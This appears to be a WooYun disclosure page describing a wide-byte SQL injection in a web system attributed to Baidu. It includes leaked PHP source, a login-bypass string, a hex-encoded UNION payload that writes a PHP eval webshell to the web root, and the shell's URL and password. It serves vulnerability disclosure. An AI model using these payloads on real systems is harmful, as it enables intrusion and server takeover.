百度某系统SQL注入到Getshell | wooyun-2015-0157024| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157024

漏洞标题：百度某系统SQL注入到Getshell

漏洞作者：玉林嘎

提交时间：2015-11-30 13:29

修复时间：2016-01-14 18:46

公开时间：2016-01-14 18:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-30：细节已通知厂商并且等待厂商处理中
2015-11-30：厂商已经确认，细节仅向厂商公开
2015-12-10：细节向核心白帽子及相关领域专家公开
2015-12-20：细节向普通白帽子公开
2015-12-30：细节向实习白帽子公开
2016-01-14：细节向公众公开

简要描述：

我又来了

详细说明：

http://115.239.210.62:8080 百度一个关于音频的系统
页面gbk猜测存在宽字节注入

%df' or 1# bypass登录

进入后台就想shell一波但是完全没有上传的地方
刚好页面有些有warnming 报出路径还想利用之前方法写波shell

但是写shell的into outfile '路径' 单引号被转义了是不行的
后台存在很多注入尝试读文件试试

是可以读文件的那么下面的思路就是审计源码寻找shell方法

/home/audio/label/apache/htdocs/new_user_post.php
/home/audio/label/apache/htdocs/new_user.php
/home/audio/label/apache/htdocs/label/index.php
/home/audio/label/apache/htdocs/register.php
/home/audio/label/apache/htdocs/user_management.php
/home/audio/label/apache/htdocs/user_modify.php
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php
/home/audio/label/apache/htdocs/session_destroy.php
/home/audio/label/apache/htdocs/user_delete.php
/home/audio/label/apache/htdocs/member_login.php
/home/audio/label/apache/htdocs/inc.php
/home/audio/label/apache/htdocs/user_modify_post.php

对上面文件进行读取简单的增删改查没有其他多余的操作
注入却无法引入单引号根据经验二次注入是可以引入'
接下来寻找二次注入且注入位置位于 select操作才可尝试写文件
突破点在下面文件

/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php

<?php
	require('inc.php');
	if (isset($_SESSION['wav']) && is_file($_SESSION['wav'])   && !unlink($_SESSION['wav']))
	{
        	echo "Warning:deleting".$_SESSION['wav']."failed";
	}
	if (isset($_SESSION['pic']) && is_file($_SESSION['pic'])   && !unlink($_SESSION['pic']))
	{
        	echo "Warning:deleting".$_SESSION['pic']."failed";
	}
	if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))
	{
        	echo "Warning:deleting".$_SESSION['adpcm']."failed";
	}
	if(isset($_GET['jump']))
        {
                if($_GET['jump']==1)
                {
                        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);
                }
                else if($_GET['jump']==2)
                {
                        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);
                }
        }
	if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")
        {
                echo "请您重新<a href='index.php'>登录</a></br>";
                header("refresh:2; URL='index.php'");
                exit;
        }
	$link = getAN_DBLink();
    if($_SESSION['auth']==2)
{
    $sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==1)
{
    $sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==0)
{
    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}
else
{
    echo "权限分配有误，请重新<a href='index.php'>登录</a></br>";
    header("refresh:2; URL='index.php'");
    exit;
}
$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";
write_log($con);        
$result=mysql_query($sql) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($_SESSION['work']=="annotate")
    $chn_type="标注"; 
else if($_SESSION['work']=="check")
    $chn_type="检查"; 
else
	$chn_type="精选"; 
?>

else if($_SESSION['auth']==0)
{
    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}

$_SESSION['auth'] 是我找到唯一在select中且有可能控制的参数
$_SESSION 是在登录赋值的那么去看下登录文件

/home/audio/label/apache/htdocs/member_login.php

<?php
require_once ('inc.php');
if(empty($_POST['name'])){
	echo "用户名不能为空,自动返回登录界面...</br></br>";
	echo "点击返回<a href='index.php'>登录界面</a>";
    	header("refresh:2; URL='index.php'");
	//echo "用户名不能为空,自动返回登录界面...</br></br>";
	//echo "点击返回<a href='index.php'>登录界面</a>";
 //        header('Location:http://10.210.26.11:8080/index.php');
	exit;	
}
else if(empty($_POST['password'])){
	echo "密码不能为空，自动返回登录界面...</br></br>";
	echo "点击返回<a href='index.php'>登录界面</a>";
	header("refresh:2; URL='index.php'");
	exit;	
}
else if(empty($_POST['yzm'])){
    echo "验证码不能为空,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
	header("refresh:2; URL='index.php'");
	exit;        
}
$link = getAN_DBLink();
$name = mysql_real_escape_string($_POST['name'], $link);
$pw   = mysql_real_escape_string($_POST['password'], $link);
$code =$_POST['yzm'];
if( $code != $_SESSION["Checknum"])
{
    echo "验证码错误，自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    mysql_close();
   header("refresh:2; URL='index.php'");
    exit;
}
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";
$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";
write_log($con); 
$result=mysql_query($sql, $link) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($num==0)
{
    echo "账户不存在，自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    mysql_close();
    header("refresh:2; URL='index.php'");
    exit;
}
$rs=mysql_fetch_object($result);
//while($rs=mysql_fetch_object($result))
if ($rs != false)
{
    $_SESSION['pass']     ="ok";
    $_SESSION['num']      =0;
    $_SESSION['name']     =$name;
    $_SESSION['id']       =$rs->id;
    $_SESSION['auth']     =$rs->authority;
    $_SESSION['rname']    =$rs->real_name;
    $_SESSION['gender']   =$rs->Gender;
    $_SESSION['mobile']   =$rs->Mobile;
    $_SESSION['ikey']     =$rs->Ikey;
    $_SESSION['mail']     =$rs->Mail;
    $_SESSION['type']     =$_POST['type'];
    $time                 =date('U');
    $ip                   ="";
    if(isset($_SERVER['HTTP_CLIENT_IP']))
    {
        $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else{
        $ip=$_SERVER['REMOTE_ADDR'];
    }

$_SESSION['auth']     =$rs->authority;

$rs又是根据

$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"

查询出来的
那么登录的时候利用联合查询直接控制authority 即可
name只需传入下面代码即可

test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#

0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027
0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'

通过联合查询不仅bypass进入系统而且在第二个字段控制为 0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'
进入之后访问 user_work.php 文件即可
最后生成shell http://115.239.210.62:8080/label/test.php 密码:s

内网未深入

漏洞证明：

http://115.239.210.62:8080 百度一个关于音频的系统
页面gbk猜测存在宽字节注入

%df' or 1# bypass登录

进入后台就想shell一波但是完全没有上传的地方
刚好页面有些有warnming 报出路径还想利用之前方法写波shell

但是写shell的into outfile '路径' 单引号被转义了是不行的
后台存在很多注入尝试读文件试试

是可以读文件的那么下面的思路就是审计源码寻找shell方法

/home/audio/label/apache/htdocs/new_user_post.php
/home/audio/label/apache/htdocs/new_user.php
/home/audio/label/apache/htdocs/label/index.php
/home/audio/label/apache/htdocs/register.php
/home/audio/label/apache/htdocs/user_management.php
/home/audio/label/apache/htdocs/user_modify.php
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php
/home/audio/label/apache/htdocs/session_destroy.php
/home/audio/label/apache/htdocs/user_delete.php
/home/audio/label/apache/htdocs/member_login.php
/home/audio/label/apache/htdocs/inc.php
/home/audio/label/apache/htdocs/user_modify_post.php

/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php

<?php
	require('inc.php');
	if (isset($_SESSION['wav']) && is_file($_SESSION['wav'])   && !unlink($_SESSION['wav']))
	{
        	echo "Warning:deleting".$_SESSION['wav']."failed";
	}
	if (isset($_SESSION['pic']) && is_file($_SESSION['pic'])   && !unlink($_SESSION['pic']))
	{
        	echo "Warning:deleting".$_SESSION['pic']."failed";
	}
	if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))
	{
        	echo "Warning:deleting".$_SESSION['adpcm']."failed";
	}
	if(isset($_GET['jump']))
        {
                if($_GET['jump']==1)
                {
                        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);
                }
                else if($_GET['jump']==2)
                {
                        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);
                }
        }
	if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")
        {
                echo "请您重新<a href='index.php'>登录</a></br>";
                header("refresh:2; URL='index.php'");
                exit;
        }
	$link = getAN_DBLink();
    if($_SESSION['auth']==2)
{
    $sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==1)
{
    $sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==0)
{
    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}
else
{
    echo "权限分配有误，请重新<a href='index.php'>登录</a></br>";
    header("refresh:2; URL='index.php'");
    exit;
}
$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";
write_log($con);        
$result=mysql_query($sql) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($_SESSION['work']=="annotate")
    $chn_type="标注"; 
else if($_SESSION['work']=="check")
    $chn_type="检查"; 
else
	$chn_type="精选"; 
?>

else if($_SESSION['auth']==0)
{
    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}

$_SESSION['auth'] 是我找到唯一在select中且有可能控制的参数
$_SESSION 是在登录赋值的那么去看下登录文件

/home/audio/label/apache/htdocs/member_login.php

<?php
require_once ('inc.php');
if(empty($_POST['name'])){
	echo "用户名不能为空,自动返回登录界面...</br></br>";
	echo "点击返回<a href='index.php'>登录界面</a>";
    	header("refresh:2; URL='index.php'");
	//echo "用户名不能为空,自动返回登录界面...</br></br>";
	//echo "点击返回<a href='index.php'>登录界面</a>";
 //        header('Location:http://10.210.26.11:8080/index.php');
	exit;	
}
else if(empty($_POST['password'])){
	echo "密码不能为空，自动返回登录界面...</br></br>";
	echo "点击返回<a href='index.php'>登录界面</a>";
	header("refresh:2; URL='index.php'");
	exit;	
}
else if(empty($_POST['yzm'])){
    echo "验证码不能为空,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
	header("refresh:2; URL='index.php'");
	exit;        
}
$link = getAN_DBLink();
$name = mysql_real_escape_string($_POST['name'], $link);
$pw   = mysql_real_escape_string($_POST['password'], $link);
$code =$_POST['yzm'];
if( $code != $_SESSION["Checknum"])
{
    echo "验证码错误，自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    mysql_close();
   header("refresh:2; URL='index.php'");
    exit;
}
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";
$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";
write_log($con); 
$result=mysql_query($sql, $link) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($num==0)
{
    echo "账户不存在，自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    mysql_close();
    header("refresh:2; URL='index.php'");
    exit;
}
$rs=mysql_fetch_object($result);
//while($rs=mysql_fetch_object($result))
if ($rs != false)
{
    $_SESSION['pass']     ="ok";
    $_SESSION['num']      =0;
    $_SESSION['name']     =$name;
    $_SESSION['id']       =$rs->id;
    $_SESSION['auth']     =$rs->authority;
    $_SESSION['rname']    =$rs->real_name;
    $_SESSION['gender']   =$rs->Gender;
    $_SESSION['mobile']   =$rs->Mobile;
    $_SESSION['ikey']     =$rs->Ikey;
    $_SESSION['mail']     =$rs->Mail;
    $_SESSION['type']     =$_POST['type'];
    $time                 =date('U');
    $ip                   ="";
    if(isset($_SERVER['HTTP_CLIENT_IP']))
    {
        $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else{
        $ip=$_SERVER['REMOTE_ADDR'];
    }

$_SESSION['auth']     =$rs->authority;

$rs又是根据

$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"

查询出来的
那么登录的时候利用联合查询直接控制authority 即可
name只需传入下面代码即可

test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#

0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027
0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'

内网未深入

修复方案：

登录之后全是注入哎。

版权声明：转载请注明来源玉林嘎@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-11-30 18:45

厂商回复：

感谢关注百度安全!

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157024

漏洞标题：百度某系统SQL注入到Getshell

相关厂商：百度

漏洞作者：玉林嘎

提交时间：2015-11-30 13:29

修复时间：2016-01-14 18:46

公开时间：2016-01-14 18:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源玉林嘎@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157024

漏洞标题：百度某系统SQL注入到Getshell

相关厂商：百度

漏洞作者： 玉林嘎

提交时间：2015-11-30 13:29

修复时间：2016-01-14 18:46

公开时间：2016-01-14 18:46

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0157024"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 玉林嘎@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：玉林嘎

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源玉林嘎@乌云